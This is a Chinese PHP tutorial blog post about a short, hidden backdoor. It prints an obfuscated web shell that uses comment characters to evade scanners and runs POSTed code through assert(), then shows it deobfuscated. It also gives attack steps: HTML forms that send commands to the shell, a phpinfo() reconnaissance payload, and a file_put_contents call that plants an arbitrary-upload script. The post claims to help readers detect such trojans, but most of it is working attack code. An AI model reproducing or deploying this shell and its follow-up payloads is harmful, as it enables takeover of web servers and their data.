本文將介紹一個代碼很簡短,而且很隱蔽的後門木馬,以便讓大家在檢測程序時可以避免被掛木馬。
檔案內容如下:
<code><?php
@<span>$_</span>=<span>"s"</span>.<span>"s"</span>./*-<span>/*-*/</span><span>"e"</span>./*-<span>/*-*/</span><span>"r"</span>;
@<span>$_</span>=<span>/*-/</span>*-*<span>/"a"./</span>*-<span>/*-*/</span><span>$_</span>./*-<span>/*-*/</span><span>"t"</span>;
@<span>$_</span>/*-<span>/*-*/</span>(<span>$/</span>*-<span>/*-*/</span>{<span>"_P"</span>./*-<span>/*-*/</span><span>"OS"</span>./*-<span>/*-*/</span><span>"T"</span>}
[<span>/*-/</span>*-*<span>/0/</span>*-<span>/*-*/</span>-<span>/*-/</span>*-*<span>/2/</span>*-<span>/*-*/</span>-<span>/*-/</span>*-*<span>/5/</span>*-<span>/*-*/</span>]);?></code>登入後複製
程式碼中插入了很多註解符,伺服器的偵測程式如果不嚴謹很難偵測。
把註解符刪除後,程式碼如下:
<code><span><span><?php</span>
@<span>$_</span>=<span>"s"</span>.<span>"s"</span>.<span>"e"</span>.<span>"r"</span>;
@<span>$_</span>=<span>"a"</span>.<span>$_</span>.<span>"t"</span>;
@<span>$_</span>(${<span>"_P"</span>.<span>"OS"</span>.<span>"T"</span>}
[<span>0</span>-<span>2</span>-<span>5</span>]);
<span>?></span></span></code>登入後複製
最後實際執行的程式碼內容為:
<code><span><span><?php</span>
assert(${<span>"_POST"</span>}[-<span>7</span>]);
<span>?></span></span></code>登入後複製
原來這個後門是利用了php assert方法來執行程式。
<code><span>bool</span><span>assert</span> ( mixed $assertion [, <span>string</span> $description ] )
</code>
登入後複製
assert() 會檢查指定的 assertion 並在結果為 FALSE 時採取適當的行動。
如果 assertion 是字串,它將會被 assert() 當做 PHP 程式碼來執行。
如果$assertion的內容為phpinfo(); 則會把伺服器的資訊傳回,使攻擊者能取得伺服器資訊對此攻擊。
上傳了這個後門程式後,攻擊者只需要建立一個簡單的html就可以在伺服器中執行php語句。
假設後門檔案是backdoor.php
<code><span><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"></span><span><<span>html</span>></span><span><<span>head</span>></span><span><<span>title</span>></span> back door <span></<span>title</span>></span><span></<span>head</span>></span><span><<span>body</span>></span><span><<span>form</span><span>name</span>=<span>"form1"</span><span>method</span>=<span>"post"</span><span>action</span>=<span>"http://www.example.com/backdoor.php"</span>></span><span><<span>p</span>></span><span><<span>textarea</span><span>name</span>=<span>"-7"</span><span>style</span>=<span>"width:500px; height:300px"</span>></span><span></<span>textarea</span>></span><span></<span>p</span>></span><span><<span>p</span>></span><span><<span>input</span><span>type</span>=<span>"submit"</span><span>value</span>=<span>"submit"</span>></span><span></<span>p</span>></span><span></<span>form</span>></span><span></<span>body</span>></span><span></<span>html</span>></span></code>
登入後複製
攻擊方式:
1.取得伺服器資訊可輸入
<code><span>phpinfo()</span>;</code>
登入後複製
2.建立一個可隨便上傳檔案的php可輸入
<code>file_put_contents(<span>'hack.php'</span>, <span>'<?php move_uploaded_file($_FILES[\'</span>name\<span>'][\'</span>tmp_name\<span>'], dirname(__FILE__).\'</span>/dest.php\<span>');?>'</span> ,<span>true</span>);</code>
登入後複製
然後建立一個上傳檔案的html調用hack.php
<code><span><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"></span><span><<span>html</span>></span><span><<span>head</span>></span><span><<span>title</span>></span> upload <span></<span>title</span>></span><span></<span>head</span>></span><span><<span>body</span>></span><span><<span>form</span><span>name</span>=<span>"form1"</span><span>method</span>=<span>"post"</span><span>action</span>=<span>"http://www.example.com/hack.php"</span><span>enctype</span>=<span>"multipart/form-data"</span>></span><span><<span>p</span>></span><span><<span>input</span><span>type</span>=<span>"file"</span><span>name</span>=<span>"name"</span>></span><span></<span>p</span>></span><span><<span>p</span>></span><span><<span>input</span><span>type</span>=<span>"submit"</span><span>value</span>=<span>"submit"</span>></span><span></<span>p</span>></span><span></<span>form</span>></span><span></<span>body</span>></span><span></<span>html</span>></span></code>
登入後複製
之後便可隨意上傳php檔案執行了。
版權聲明:本文為部落客原創文章,未經部落客允許不得轉載。
以上就介紹了程式碼簡短且隱密的後門木馬,包括了方面的內容,希望對PHP教學有興趣的朋友有幫助。
